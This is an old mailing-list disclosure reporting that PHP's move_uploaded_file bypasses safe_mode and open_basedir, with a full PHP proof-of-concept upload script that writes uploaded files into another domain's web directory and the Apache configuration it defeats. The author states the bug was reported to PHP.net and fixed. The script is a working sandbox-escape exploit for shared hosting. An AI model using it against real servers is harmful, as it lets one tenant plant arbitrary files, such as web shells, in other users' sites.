move_uploaded_file breaks safe_mode restrictions in PHP

["Tozz" <tozz () embrace selwerd nl>]

Hey

Its possible to circumvent (probadly spelled wrong) PHP safe_mode
restrictions by using move_uploaded_file.

You take this nasty script (and you have domain whatever.com and your
directory path is
/domains/whatever.com/ )

<?

$file = $HTTP_POST_FILES['file']['name'];
$type = $HTTP_POST_FILES['file']['type'];
$size = $HTTP_POST_FILES['file']['size'];
$temp = $HTTP_POST_FILES['file']['tmp_name'];

$size_limit = "100000"; // set size limit in bytes

if ($file){
if ($size < $size_limit){

move_uploaded_file($temp,
"/domains/somebodyelse.org/public_html/www/test/".$file);
echo "The file <tt>$file</tt> was sucessfully
uploaded";
} else {
echo "Sorry, your file exceeds the size limit of $size_limit
bytes";
}}

echo "
<form enctype='multipart/form-data' action=$PHP_SELF method=post>
Upload a file: <input name='file' type='file'>
<input type='submit' value='Upload'>
</form>
";
?>

As you can see, he moved the uploaded file to:
"/domains/somebodyelse.org/public_html/www/test/" while the user is
restricted with both safe_mode and open_basedir.

Virtualhost configuration snippet:

<VirtualHost IP_HERE>
        DocumentRoot /domains/whatever.com/public_html/root/
        ServerName root.whatever.com
        CustomLog /domains/whatever.com/logs/access_log combined
        ErrorLog /domains/whatever.com/logs/error_log
        php_admin_value safe_mode 1
        php_admin_value open_basedir /domains/whatever.com/public_html/root/
</VirtualHost>

As you can see I have both set safe_mode and the open_basedir
restriction but this user is able to upload any file where the apache
user has write access.

PHP.net is notified, and the bug has been fixed in CVS. However, I am unable
to compile the CVS version atm. Gives alot of 'make' errors. Thanks go out
to bastijs for pointing this out to me.

Bye,
Tozz